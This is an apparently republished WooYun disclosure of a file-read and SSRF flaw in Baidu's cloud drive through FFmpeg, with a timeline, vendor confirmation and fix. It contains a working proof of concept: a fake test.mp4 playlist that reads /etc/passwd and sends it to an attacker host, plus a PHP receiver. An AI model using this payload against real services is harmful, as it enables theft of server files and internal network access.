百度云盘文件读取/SSRF

admin 2017年5月1日08:32:40评论289 views字数 195阅读0分39秒阅读模式
摘要

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

漏洞概要 关注数(79) 关注此漏洞

缺陷编号: WooYun-2016-205320

漏洞标题: 百度云盘文件读取/SSRF

相关厂商: 百度

漏洞作者: Noxxx

提交时间: 2016-05-05 16:09

公开时间: 2016-06-20 18:10

漏洞类型: 应用配置错误

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

8人收藏


漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

简要描述:

rt

详细说明:

相关链接

code 区域
https://hackerone.com/reports/115857
https://habrahabr.ru/company/mailru/blog/274855/

FFmpeg的问题。在百度云盘上上传一个test.mp4视频,应该还影响其他的视频应用。

打开即可文件读取。

========

test.mp4 (需要上传到视频的文件)

code 区域
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://u-url/exp/movie/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST
code 区域
concat:http://u-url/exp/movie/header.m3u8|http://baidu.com

header.m3u8 (分段用的)

code 区域
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://u-url/exp/movie/comm.php?x=

comm.php (接收数据用的)

code 区域
<?php
file_put_contents(time()."_test.txt",$_GET['x']);
?>

准备好之后 上传mp4到百度盘上然后预览视频即可触发,也可以ssrf

漏洞证明:

数据

百度云盘文件读取/SSRF

code 区域
GET /root:x:0:0:root:/root:/bin/bash HTTP/1.1
User-Agent: Lavf/55.50.100
Accept: */*
Connection: close

修复方案:

升级FFmpeg

版权声明:转载请注明来源 Noxxx@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-05-06 18:06

厂商回复:

感谢您关注百度安全!

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-05-05 16:11 | 浩天 百度云盘文件读取/SSRF ( 普通白帽子 | Rank:925 漏洞数:80 | 哈!躁起来!)

    0

    刚开始我不信,现在我信了

  2. 2016-05-05 16:15 | 隐形人真忙 ( 普通白帽子 | Rank:201 漏洞数:25 | ...)

    0

    @浩天 hackerone上有相关案例的

  3. 2016-05-05 16:20 | scanf ( 核心白帽子 | Rank:1694 漏洞数:239 | 。)

    0

    刚开始我不信,现在我信了

  4. 2016-05-05 16:34 | 玉林嘎 百度云盘文件读取/SSRF ( 普通白帽子 | Rank:941 漏洞数:108 )

    0

    刚开始我不信,现在我信了

  5. 2016-05-05 16:35 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号:233sec 不定期分享各种漏洞思...)

    0

    刚开始我不信,现在我信了

  6. 2016-05-05 16:40 | whynot ( 普通白帽子 | Rank:678 漏洞数:136 | 为你解冻冰河 为你放弃世界有何不可)

    0

    楼上的 刚开始我不信,现在我信了

  7. 2016-05-05 16:40 | Drizzle.Risk ( 普通白帽子 | Rank:265 漏洞数:20 | 放下屠刀,立地成蛤)

    0

    都是ImageTragick?

  8. 2016-05-05 16:44 | F4K3R ( 普通白帽子 | Rank:318 漏洞数:34 | 求团队收留。)

    0

    干嘛不弹SHELL

  9. 2016-05-05 17:10 | Bird ( 实习白帽子 | Rank:60 漏洞数:25 | Stay hungry. Stay foolish.)

    0

    我还是信了吧= =

  10. 2016-05-05 17:12 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低,根本轮不到去拼...)

    0

    来了!

  11. 2016-05-05 19:49 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

    0

    是不是rpc啊

  12. 2016-05-05 20:47 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

    0

    @hear7v 好吧,我错了,我信了

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin